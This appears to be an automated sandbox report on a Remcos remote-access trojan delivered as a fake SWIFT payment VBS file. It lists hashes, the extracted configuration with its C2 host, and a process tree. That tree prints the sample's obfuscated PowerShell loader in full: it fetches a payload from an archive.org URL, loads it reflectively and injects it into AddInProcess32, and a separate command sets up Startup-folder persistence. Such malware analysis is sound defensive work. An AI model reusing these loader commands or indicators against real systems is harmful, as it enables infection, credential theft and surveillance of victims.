remcos | 162bc0224d6edb13077ab6483e8e7d507a6a4805945a9758595f57028f5683d8

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-10-2024 12:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SWIFT 103 202410071251443120 071024-pdf.vbs
Size

192KB
MD5

0f65fc79f42cc4c38a78b4c38411e98f
SHA1

4b6432ade0231ca6849a30f1ab88e4bf2419ace5
SHA256

162bc0224d6edb13077ab6483e8e7d507a6a4805945a9758595f57028f5683d8
SHA512

cd13f395e20fcc247015ae12da6dd653d810258e0b83a8ee8fb6eaba9213eba7fda9d0cc027b93ec5d2e81f44fe4c4ae53ed403dddba91cd46f374a72ffc5112
SSDEEP

3072:C5XV+GVQUD9JyGdr9blygBDgt5ptGwOnCL53EBmC75o6dIY2lruQ:CbDBDGGp9bSomC75o6d2liQ

Score

10^/10

remcos octobers collection discovery execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

exe.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

Extracted

Family

remcos

Botnet

OCTOBERS

ab9001.ddns.net:23782

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
VLC.exe
copy_folder
VLC
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Chrorne-28R56P
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Rmc
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/1496-120-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/2152-114-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/3224-113-0x0000000000400000-0x0000000000457000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/3224-113-0x0000000000400000-0x0000000000457000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/2152-114-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 2 IoCs

flow	pid	Process
17	4256	powershell.exe
20	4256	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2260	powershell.exe
4256	powershell.exe
2404	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\catolicismo.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\catolicismo.vbs	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	AddInProcess32.exe

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 4256 set thread context of 2524	4256	powershell.exe	93
PID 2524 set thread context of 332	2524	AddInProcess32.exe	94
PID 2524 set thread context of 2152	2524	AddInProcess32.exe	110
PID 2524 set thread context of 3224	2524	AddInProcess32.exe	111
PID 2524 set thread context of 1496	2524	AddInProcess32.exe	113
PID 2524 set thread context of 4292	2524	AddInProcess32.exe	131
PID 2524 set thread context of 3620	2524	AddInProcess32.exe	141
PID 2524 set thread context of 5908	2524	AddInProcess32.exe	152
PID 2524 set thread context of 3988	2524	AddInProcess32.exe	162
PID 2524 set thread context of 5976	2524	AddInProcess32.exe	172
PID 2524 set thread context of 2156	2524	AddInProcess32.exe	182
PID 2524 set thread context of 4928	2524	AddInProcess32.exe	193

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4800	cmd.exe
5068	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5068	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
2404	powershell.exe
2404	powershell.exe
2260	powershell.exe
2260	powershell.exe
4256	powershell.exe
4256	powershell.exe
2776	msedge.exe
2776	msedge.exe
1632	msedge.exe
1632	msedge.exe
2152	AddInProcess32.exe
2152	AddInProcess32.exe
1496	AddInProcess32.exe
1496	AddInProcess32.exe
2152	AddInProcess32.exe
2152	AddInProcess32.exe
2040	identity_helper.exe
2040	identity_helper.exe
4320	msedge.exe
4320	msedge.exe
4320	msedge.exe
4320	msedge.exe

Suspicious behavior: MapViewOfSection 12 IoCs

pid	Process
2524	AddInProcess32.exe
2524	AddInProcess32.exe
2524	AddInProcess32.exe
2524	AddInProcess32.exe
2524	AddInProcess32.exe
2524	AddInProcess32.exe
2524	AddInProcess32.exe
2524	AddInProcess32.exe
2524	AddInProcess32.exe
2524	AddInProcess32.exe
2524	AddInProcess32.exe
2524	AddInProcess32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 33 IoCs

pid	Process
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	4256	powershell.exe
Token: SeDebugPrivilege	1496	AddInProcess32.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe
1632	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2524	AddInProcess32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1300 wrote to memory of 4800	1300	WScript.exe	83
PID 1300 wrote to memory of 4800	1300	WScript.exe	83
PID 4800 wrote to memory of 5068	4800	cmd.exe	85
PID 4800 wrote to memory of 5068	4800	cmd.exe	85
PID 4800 wrote to memory of 2404	4800	cmd.exe	88
PID 4800 wrote to memory of 2404	4800	cmd.exe	88
PID 1300 wrote to memory of 2260	1300	WScript.exe	89
PID 1300 wrote to memory of 2260	1300	WScript.exe	89
PID 2260 wrote to memory of 4256	2260	powershell.exe	91
PID 2260 wrote to memory of 4256	2260	powershell.exe	91
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 4256 wrote to memory of 2524	4256	powershell.exe	93
PID 2524 wrote to memory of 332	2524	AddInProcess32.exe	94
PID 2524 wrote to memory of 332	2524	AddInProcess32.exe	94
PID 2524 wrote to memory of 332	2524	AddInProcess32.exe	94
PID 2524 wrote to memory of 332	2524	AddInProcess32.exe	94
PID 332 wrote to memory of 1632	332	svchost.exe	97
PID 332 wrote to memory of 1632	332	svchost.exe	97
PID 1632 wrote to memory of 2500	1632	msedge.exe	98
PID 1632 wrote to memory of 2500	1632	msedge.exe	98
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99
PID 1632 wrote to memory of 1176	1632	msedge.exe	99

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071251443120 071024-pdf.vbs"
1⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1300
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071251443120 071024-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.omsicilotac.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4800
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\SWIFT 103 202410071251443120 071024-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.omsicilotac.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRzaGVMTGlkWzFdKyRzSGVsTGlEWzEzXSsnWCcpKCgoJ2loTmltYWdlVXJsID0gaW9FaHR0cHM6Ly9pYTYwMDEwMi51cy5hcmNoaXZlLm9yZy8zMi9pdGVtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RldGFoTicrJ290ZV9WLmpwZyBpb0U7aWhOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtpaE5pbWFnZUJ5dGVzID0gaWhOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShpaE5pbWFnZVVybCcrJyk7aWhOaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTonKyc6VVRGOC5HZXRTdHJpbmcoaWhOaW1hZ2VCeXRlcyk7aWhOc3RhcnRGbGFnID0gaW9FPDxCQVNFNjRfU1RBUlQ+PmlvRTtpaE4nKydlbmRGbGFnID0nKycgaW9FPDxCQVNFNjRfRU5EPj5pb0U7aWhOc3RhcnRJbmRleCA9IGloTmltJysnYWdlVGV4dC5JbmRleE8nKydmKGloTnN0YXJ0RmxhZyk7aWhOZW5kSW5kZXggPSBpaCcrJ05pbWFnZVRleHQuSW5kZXhPZihpaE5lbmRGbGFnKTtpaE5zdGFydEluZGV4IC1nZSAwIC1hbmQgaScrJ2hOZW5kSW5kZXggLWd0IGloTnN0YXJ0SW5kZXg7aWhOc3RhcnRJbmRleCArPSBpaE5zdGFydEZsYWcuTGVuZ3RoO2loTmJhc2U2NExlbmd0aCA9IGloTmVuZEluZGV4IC0gaWhOc3RhcnRJbmRleDtpaCcrJ05iYXNlNjRDb21tYW5kID0gaWhOaW1hZ2VUZXh0LlN1YnN0cmluZyhpaCcrJ05zdGFydEluZGV4LCBpaE5iYXNlNjRMZW5ndGgpO2loTmNvbW1hbmRCeXRlcyAnKyc9IFtTeXN0ZW0uQ29udmVydF06OkYnKydyb21CYXNlNjRTdHJpbmcoaWhOYmFzZTY0Q29tbWFuZCk7aWhObG9hZGUnKydkQXNzZW0nKydibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGloTmNvbScrJ21hbmRCeXRlcyk7aWhOdmFpTWV0aG9kID0gW2RubGliLklPLkgnKydvbWVdLkdldCcrJ01ldGhvZChpb0VWQUlpb0UpO2loTnZhaU1ldGhvZC5JbnZva2UoaWhObnVsbCwgQChpb0UwL2Z4RXVQL2QvZWUuZXRzYXAvLzpzcCcrJ3R0aGlvRSwgaW9FZGVzYXRpdmFkb2lvRSwgaW9FZGVzJysnYXRpdmFkb2lvRSwgaW9FZGVzYXRpdmFkb2lvRSwgaW9FQWRkSW5Qcm8nKydjZXNzMzJpb0UsIGlvRWRlc2F0aXZhZG9pb0UsIGlvRWRlc2F0aXZhZG9pb0UpKTsnKSAtY3JlcExBQ0UnaWhOJyxbY2hhUl0zNi1yRVBsYWNFICAnaW9FJyxbY2hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2260
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $sheLLid[1]+$sHelLiD[13]+'X')((('ihNimageUrl = ioEhttps://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahN'+'ote_V.jpg ioE;ihNwebClient = New-Object System.Net.WebClient;ihNimageBytes = ihNwebClient.DownloadData(ihNimageUrl'+');ihNimageText = [System.Text.Encoding]:'+':UTF8.GetString(ihNimageBytes);ihNstartFlag = ioE<<BASE64_START>>ioE;ihN'+'endFlag ='+' ioE<<BASE64_END>>ioE;ihNstartIndex = ihNim'+'ageText.IndexO'+'f(ihNstartFlag);ihNendIndex = ih'+'NimageText.IndexOf(ihNendFlag);ihNstartIndex -ge 0 -and i'+'hNendIndex -gt ihNstartIndex;ihNstartIndex += ihNstartFlag.Length;ihNbase64Length = ihNendIndex - ihNstartIndex;ih'+'Nbase64Command = ihNimageText.Substring(ih'+'NstartIndex, ihNbase64Length);ihNcommandBytes '+'= [System.Convert]::F'+'romBase64String(ihNbase64Command);ihNloade'+'dAssem'+'bly = [System.Reflection.Assembly]::Load(ihNcom'+'mandBytes);ihNvaiMethod = [dnlib.IO.H'+'ome].Get'+'Method(ioEVAIioE);ihNvaiMethod.Invoke(ihNnull, @(ioE0/fxEuP/d/ee.etsap//:sp'+'tthioE, ioEdesativadoioE, ioEdes'+'ativadoioE, ioEdesativadoioE, ioEAddInPro'+'cess32ioE, ioEdesativadoioE, ioEdesativadoioE));') -crepLACE'ihN',[chaR]36-rEPlacE 'ioE',[chaR]39))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4256
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2524
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:332
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:1632
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0x100,0x104,0xfc,0x108,0x7ffa380546f8,0x7ffa38054708,0x7ffa38054718
        7⤵
        
        PID:2500
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
        7⤵
        
        PID:1176
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2776
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
        7⤵
        
        PID:1984
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1
        7⤵
        
        PID:5008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
        7⤵
        
        PID:5060
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
        7⤵
        
        PID:520
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
        7⤵
        
        PID:4964
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2040
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
        7⤵
        
        PID:4732
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
        7⤵
        
        PID:2424
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1
        7⤵
        
        PID:4508
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
        7⤵
        
        PID:3576
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:1
        7⤵
        
        PID:1780
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,3930907047716502559,12312424106687915402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
        7⤵
        
        PID:3872
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
